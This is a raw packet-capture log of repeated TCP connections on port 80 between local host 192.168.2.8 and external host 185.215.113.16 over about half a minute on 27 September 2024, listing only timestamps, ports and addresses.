Sep 27, 2024 07:02:52.685580969 CEST	80	49756	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:52.685688019 CEST	49756	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:52.790549994 CEST	49756	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:52.790927887 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:52.796071053 CEST	80	49756	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:52.796084881 CEST	80	49757	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:52.796192884 CEST	49756	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:52.796243906 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:52.796557903 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:52.801287889 CEST	80	49757	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:53.515979052 CEST	80	49757	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:53.516088009 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.562483072 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.567282915 CEST	80	49757	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:53.793876886 CEST	80	49757	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:53.793947935 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.898300886 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.898636103 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.903410912 CEST	80	49758	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:53.903459072 CEST	80	49757	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:53.903521061 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.903557062 CEST	49757	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.903774977 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:53.908581972 CEST	80	49758	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:54.592211962 CEST	80	49758	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:54.592336893 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.593456984 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.598203897 CEST	80	49758	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:54.815093040 CEST	80	49758	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:54.815347910 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.928302050 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.928733110 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.936804056 CEST	80	49758	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:54.936815977 CEST	80	49759	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:54.936883926 CEST	49758	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.937058926 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.937334061 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:54.942039967 CEST	80	49759	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:55.627449036 CEST	80	49759	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:55.627507925 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.628256083 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.633028030 CEST	80	49759	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:55.850049973 CEST	80	49759	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:55.850213051 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.959559917 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.959959030 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.964667082 CEST	80	49759	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:55.964724064 CEST	49759	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.964772940 CEST	80	49760	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:55.964843988 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.965049982 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:55.969790936 CEST	80	49760	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:56.694044113 CEST	80	49760	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:56.694197893 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:56.772474051 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:56.777255058 CEST	80	49760	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:57.007092953 CEST	80	49760	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:57.007154942 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.115927935 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.116364002 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.120903015 CEST	80	49760	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:57.120965958 CEST	49760	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.121134996 CEST	80	49761	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:57.121228933 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.121422052 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.126158953 CEST	80	49761	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:57.829888105 CEST	80	49761	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:57.829951048 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.830708027 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:57.835537910 CEST	80	49761	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:58.077756882 CEST	80	49761	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:58.077820063 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.194014072 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.194366932 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.199115038 CEST	80	49761	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:58.199146032 CEST	80	49762	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:58.199235916 CEST	49761	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.199266911 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.199486017 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.204385042 CEST	80	49762	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:58.901690960 CEST	80	49762	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:58.901834011 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.905006886 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:58.909811020 CEST	80	49762	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:59.132129908 CEST	80	49762	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:59.136135101 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.244051933 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.244386911 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.249066114 CEST	80	49762	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:59.249119997 CEST	49762	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.249130964 CEST	80	49763	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:59.249191046 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.251188993 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.255975008 CEST	80	49763	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:59.955395937 CEST	80	49763	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:59.955496073 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.958581924 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:59.963418961 CEST	80	49763	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:00.189183950 CEST	80	49763	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:00.189302921 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:00.303293943 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:00.303637028 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:00.308438063 CEST	80	49764	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:00.308551073 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:00.308712959 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:00.308913946 CEST	80	49763	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:00.308971882 CEST	49763	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:00.313477993 CEST	80	49764	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:01.015784025 CEST	80	49764	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:01.015894890 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.016632080 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.021357059 CEST	80	49764	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:01.248519897 CEST	80	49764	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:01.248575926 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.350169897 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.350513935 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.355180979 CEST	80	49764	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:01.355288029 CEST	49764	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.355298042 CEST	80	49765	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:01.355364084 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.355509996 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:01.360265970 CEST	80	49765	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:02.077279091 CEST	80	49765	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:02.077368021 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.077987909 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.082756042 CEST	80	49765	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:02.307926893 CEST	80	49765	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:02.308320999 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.413140059 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.413475037 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.418365955 CEST	80	49765	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:02.418382883 CEST	80	49766	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:02.418463945 CEST	49765	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.418533087 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.480050087 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:02.484833956 CEST	80	49766	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:03.109131098 CEST	80	49766	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:03.109186888 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.109956980 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.114846945 CEST	80	49766	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:03.339112997 CEST	80	49766	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:03.339217901 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.445979118 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.446281910 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.454562902 CEST	80	49767	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:03.454684973 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.454793930 CEST	80	49766	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:03.454843998 CEST	49766	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.455001116 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:03.463382006 CEST	80	49767	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:04.155088902 CEST	80	49767	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:04.155304909 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.156084061 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.160887003 CEST	80	49767	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:04.383002996 CEST	80	49767	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:04.383081913 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.490890980 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.491264105 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.495995045 CEST	80	49767	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:04.496032000 CEST	80	49768	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:04.496113062 CEST	49767	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.496176004 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.496404886 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:04.501163960 CEST	80	49768	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:05.223476887 CEST	80	49768	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:05.223596096 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.224349022 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.229149103 CEST	80	49768	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:05.460809946 CEST	80	49768	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:05.460956097 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.572097063 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.572468042 CEST	49769	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.577140093 CEST	80	49768	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:05.577253103 CEST	49768	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.577471018 CEST	80	49769	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:05.577541113 CEST	49769	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.578154087 CEST	49769	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:05.582937956 CEST	80	49769	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:06.305886030 CEST	80	49769	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:06.305948973 CEST	49769	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:06.308747053 CEST	49769	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:06.309089899 CEST	49770	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:06.313724041 CEST	80	49769	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:06.313774109 CEST	49769	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:06.314013958 CEST	80	49770	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:06.314074039 CEST	49770	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:06.314284086 CEST	49770	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:06.319189072 CEST	80	49770	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.054560900 CEST	80	49770	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.054634094 CEST	49770	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.165847063 CEST	49770	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.166208029 CEST	49771	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.171147108 CEST	80	49771	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.171159983 CEST	80	49770	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.171269894 CEST	49770	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.171371937 CEST	49771	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.171538115 CEST	49771	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.176291943 CEST	80	49771	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.884605885 CEST	80	49771	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.884771109 CEST	49771	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.888468027 CEST	49771	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.889022112 CEST	49772	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.893462896 CEST	80	49771	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.893531084 CEST	49771	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.893821001 CEST	80	49772	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:07.893887043 CEST	49772	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.894144058 CEST	49772	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:07.898829937 CEST	80	49772	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:08.633831024 CEST	80	49772	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:08.633924007 CEST	49772	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:08.743088961 CEST	49772	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:08.743451118 CEST	49773	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:08.748251915 CEST	80	49772	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:08.748290062 CEST	80	49773	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:08.748358011 CEST	49772	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:08.748383045 CEST	49773	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:08.748604059 CEST	49773	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:08.753345966 CEST	80	49773	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:09.455537081 CEST	80	49773	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:09.455696106 CEST	49773	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:09.458472967 CEST	49773	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:09.458748102 CEST	49774	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:09.463658094 CEST	80	49774	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:09.463671923 CEST	80	49773	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:09.463748932 CEST	49773	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:09.463748932 CEST	49774	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:09.464039087 CEST	49774	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:09.468761921 CEST	80	49774	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:10.312846899 CEST	80	49774	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:10.313049078 CEST	49774	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:10.430629015 CEST	49774	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:10.430973053 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:10.435745955 CEST	80	49775	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:10.435797930 CEST	80	49774	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:10.435817957 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:10.435877085 CEST	49774	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:10.436522007 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:10.441297054 CEST	80	49775	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:11.134490013 CEST	80	49775	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:11.134788990 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.141901016 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.146739006 CEST	80	49775	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:11.365715027 CEST	80	49775	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:11.365783930 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.479770899 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.481053114 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.484863997 CEST	80	49775	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:11.484914064 CEST	49775	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.486011982 CEST	80	49776	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:11.486109972 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.486489058 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:11.491416931 CEST	80	49776	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:12.195040941 CEST	80	49776	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:12.196183920 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.440891981 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.446770906 CEST	80	49776	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:12.666821957 CEST	80	49776	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:12.666872978 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.774904966 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.775262117 CEST	49777	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.779890060 CEST	80	49776	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:12.779941082 CEST	49776	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.780061960 CEST	80	49777	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:12.780143023 CEST	49777	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.780448914 CEST	49777	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:12.785185099 CEST	80	49777	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:13.473465919 CEST	80	49777	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:13.473546028 CEST	49777	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:13.478188992 CEST	49777	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:13.478425026 CEST	49778	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:13.483272076 CEST	80	49777	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:13.483340979 CEST	80	49778	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:13.483402014 CEST	49777	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:13.483447075 CEST	49778	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:13.483611107 CEST	49778	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:13.488584042 CEST	80	49778	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:14.206523895 CEST	80	49778	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:14.206631899 CEST	49778	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:14.321511984 CEST	49778	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:14.322590113 CEST	49779	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:14.326594114 CEST	80	49778	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:14.326689005 CEST	49778	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:14.327442884 CEST	80	49779	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:14.327661991 CEST	49779	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:14.327819109 CEST	49779	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:14.332631111 CEST	80	49779	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.021306038 CEST	80	49779	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.022368908 CEST	49779	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.125762939 CEST	49779	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.126089096 CEST	49780	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.130727053 CEST	80	49779	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.130856991 CEST	49779	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.130959988 CEST	80	49780	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.131026030 CEST	49780	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.255455017 CEST	49780	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.260307074 CEST	80	49780	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.838093042 CEST	80	49780	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.838226080 CEST	49780	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.954617977 CEST	49780	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.954966068 CEST	49781	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.959809065 CEST	80	49780	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.959860086 CEST	80	49781	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:15.959916115 CEST	49780	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.959954023 CEST	49781	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.960305929 CEST	49781	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:15.965043068 CEST	80	49781	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:16.646750927 CEST	80	49781	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:16.646907091 CEST	49781	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:16.650316954 CEST	49781	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:16.650669098 CEST	49782	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:16.655437946 CEST	80	49781	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:16.655462027 CEST	80	49782	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:16.655495882 CEST	49781	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:16.655549049 CEST	49782	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:16.655821085 CEST	49782	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:16.660564899 CEST	80	49782	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:17.389102936 CEST	80	49782	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:17.389188051 CEST	49782	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:17.494220972 CEST	49782	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:17.494570017 CEST	49783	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:17.499453068 CEST	80	49782	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:17.499469042 CEST	80	49783	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:17.499511003 CEST	49782	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:17.499558926 CEST	49783	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:17.499846935 CEST	49783	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:17.504714966 CEST	80	49783	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:18.190360069 CEST	80	49783	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:18.190412045 CEST	49783	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:18.194215059 CEST	49783	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:18.194827080 CEST	49784	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:18.199533939 CEST	80	49783	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:18.199594021 CEST	49783	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:18.199798107 CEST	80	49784	185.215.113.16	192.168.2.8
